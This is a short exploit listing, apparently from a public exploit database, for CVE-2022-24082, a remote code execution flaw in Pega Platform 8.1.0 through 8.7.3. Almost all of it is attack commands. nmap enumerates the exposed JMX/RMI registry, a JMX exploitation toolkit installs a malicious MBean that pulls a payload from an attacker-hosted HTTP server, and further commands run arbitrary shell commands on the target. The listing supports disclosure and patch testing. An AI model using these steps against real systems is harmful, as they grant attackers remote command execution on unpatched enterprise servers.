# Exploit Title: Pega Platform 8.1.0 (and higher) Remote Code Execution  
# Google Dork: N/A  
# Date: 20 Oct 2022  
# Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit)  
# Vendor Homepage:  
# Software Link: Not Available  
# Version: 8.1.0 on-premise and higher, up to 8.7.3  
# Tested on: Red Hat Enterprise 7  
# CVE : CVE-2022-24082  
;Dumping RMI registry:  
nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address>  
;Extracting dynamic TCP port number from the dump (in form of @<PORT>)  
;Verifying that the <PORT> is indeed open (it gives in the RMI dump, but actually listens on the network as well):  
nmap -sT -sV -p <PORT> <IP Address>  
;Exploitation requires:  
;- JVM  
;- MOGWAI LABS JMX Exploitation Toolkit (  
;- jython  
;Installing mbean for remote code execution  
java -jar jython-standalone-2.7.2.jar --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666  
;Execution of commands id & ifconfig  
java -jar jython-standalone-2.7.2.jar --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig"  
;More details: